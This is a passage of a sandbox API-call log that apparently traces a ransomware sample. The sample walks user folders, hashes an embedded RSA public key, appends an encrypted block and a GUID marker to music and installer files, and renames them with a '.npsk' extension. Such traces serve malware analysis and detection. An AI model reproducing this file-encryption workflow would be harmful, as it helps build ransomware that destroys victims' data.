KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.369] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b21b0) returned 1 [0218.370] CryptCreateHash (in: hProv=0x7b21b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0218.370] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0218.371] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0218.371] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0218.371] GetLastError () returned 0x0 [0218.371] CryptDestroyHash (hHash=0x3277d68) returned 1 [0218.371] CryptReleaseContext (hProv=0x7b21b0, dwFlags=0x0) returned 1 [0218.371] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0218.371] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0218.371] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0218.372] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0218.373] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xdd600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.373] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0218.374] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0218.374] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0218.374] CloseHandle (hObject=0x61c) returned 1 [0218.420] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.npsk")) returned 1 [0218.423] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 0 [0218.423] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.423] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.423] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.423] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\sfOvbWyBWDmisY\\") returned="sfOvbWyBWDmisY\\" [0218.423] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\") returned="tP3BeQ_6ct\\" [0218.423] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\") returned="sg3CqdHoD\\" [0218.423] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\") returned="tCN4\\" [0218.424] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0218.424] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.424] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.424] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.424] PathFindFileNameW (pszPath="") returned="" [0218.424] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\sfOvbWyBWDmisY\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23effee0, ftCreationTime.dwHighDateTime=0x1d5db82, ftLastAccessTime.dwLowDateTime=0xc5100930, ftLastAccessTime.dwHighDateTime=0x1d5dc29, ftLastWriteTime.dwLowDateTime=0xc5100930, ftLastWriteTime.dwHighDateTime=0x1d5dc29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.424] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23effee0, ftCreationTime.dwHighDateTime=0x1d5db82, ftLastAccessTime.dwLowDateTime=0xc5100930, ftLastAccessTime.dwHighDateTime=0x1d5dc29, ftLastWriteTime.dwLowDateTime=0xc5100930, ftLastWriteTime.dwHighDateTime=0x1d5dc29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.424] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c59d830, ftCreationTime.dwHighDateTime=0x1d5e7da, ftLastAccessTime.dwLowDateTime=0x62f92f70, ftLastAccessTime.dwHighDateTime=0x1d5dca5, ftLastWriteTime.dwLowDateTime=0x62f92f70, ftLastWriteTime.dwHighDateTime=0x1d5dca5, nFileSizeHigh=0x0, nFileSizeLow=0xf83, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dBHH9jZYnjfv.m4a", cAlternateFileName="DBHH9J~1.M4A")) returned 1 [0218.424] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\sfOvbWyBWDmisY\\dBHH9jZYnjfv.m4a") returned=".m4a" [0218.424] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\sfOvbWyBWDmisY\\dBHH9jZYnjfv.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\sfovbwybwdmisy\\dbhh9jzynjfv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0218.425] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=3971) returned 1 [0218.425] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0218.427] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xf5d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.427] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0218.429] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xf83, lpOverlapped=0x0) returned 1 [0218.429] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.429] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.429] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.429] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b21b0) returned 1 [0218.430] CryptCreateHash (in: hProv=0x7b21b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0218.430] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0218.430] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0218.430] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0218.430] GetLastError () returned 0x0 [0218.430] CryptDestroyHash (hHash=0x3277d68) returned 1 [0218.430] CryptReleaseContext (hProv=0x7b21b0, dwFlags=0x0) returned 1 [0218.430] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0218.430] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0218.430] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0218.430] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0218.431] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xf83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.431] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0218.431] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0218.431] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0218.432] CloseHandle (hObject=0x61c) returned 1 [0218.435] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\sfOvbWyBWDmisY\\dBHH9jZYnjfv.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\sfovbwybwdmisy\\dbhh9jzynjfv.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\sfOvbWyBWDmisY\\dBHH9jZYnjfv.m4a.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\sfovbwybwdmisy\\dbhh9jzynjfv.m4a.npsk")) returned 1 [0218.436] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x272179e0, ftCreationTime.dwHighDateTime=0x1d5dfce, ftLastAccessTime.dwLowDateTime=0x29de87b0, ftLastAccessTime.dwHighDateTime=0x1d5db94, ftLastWriteTime.dwLowDateTime=0x29de87b0, ftLastWriteTime.dwHighDateTime=0x1d5db94, nFileSizeHigh=0x0, nFileSizeLow=0x16ea9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecEOjWe9vdiSAkGI0.mp3", cAlternateFileName="RECEOJ~1.MP3")) returned 1 [0218.437] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\sfOvbWyBWDmisY\\RecEOjWe9vdiSAkGI0.mp3") returned=".mp3" [0218.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\sfOvbWyBWDmisY\\RecEOjWe9vdiSAkGI0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\sfovbwybwdmisy\\receojwe9vdisakgi0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0218.437] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=93865) returned 1 [0218.437] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0218.439] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16e83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.439] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0218.442] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x16ea9, lpOverlapped=0x0) returned 1 [0218.443] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.443] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.443] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.443] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b21b0) returned 1 [0218.444] CryptCreateHash (in: hProv=0x7b21b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0218.444] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0218.444] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0218.444] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0218.444] GetLastError () returned 0x0 [0218.444] CryptDestroyHash (hHash=0x3277d68) returned 1 [0218.444] CryptReleaseContext (hProv=0x7b21b0, dwFlags=0x0) returned 1 [0218.445] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0218.445] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0218.445] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0218.445] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0218.446] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16ea9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.446] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0218.446] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0218.446] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0218.446] CloseHandle (hObject=0x61c) returned 1 [0218.451] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\sfOvbWyBWDmisY\\RecEOjWe9vdiSAkGI0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\sfovbwybwdmisy\\receojwe9vdisakgi0.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\sfOvbWyBWDmisY\\RecEOjWe9vdiSAkGI0.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\sfovbwybwdmisy\\receojwe9vdisakgi0.mp3.npsk")) returned 1 [0218.456] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x272179e0, ftCreationTime.dwHighDateTime=0x1d5dfce, ftLastAccessTime.dwLowDateTime=0x29de87b0, ftLastAccessTime.dwHighDateTime=0x1d5db94, ftLastWriteTime.dwLowDateTime=0x29de87b0, ftLastWriteTime.dwHighDateTime=0x1d5db94, nFileSizeHigh=0x0, nFileSizeLow=0x16ea9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecEOjWe9vdiSAkGI0.mp3", cAlternateFileName="RECEOJ~1.MP3")) returned 0 [0218.456] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.457] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.457] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\") returned="pAmb2w5Ag3o\\" [0218.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\") returned="xaU6e6HDu\\" [0218.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\") returned="sg3CqdHoD\\" [0218.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\") returned="tCN4\\" [0218.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0218.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.457] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.457] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.457] PathFindFileNameW (pszPath="") 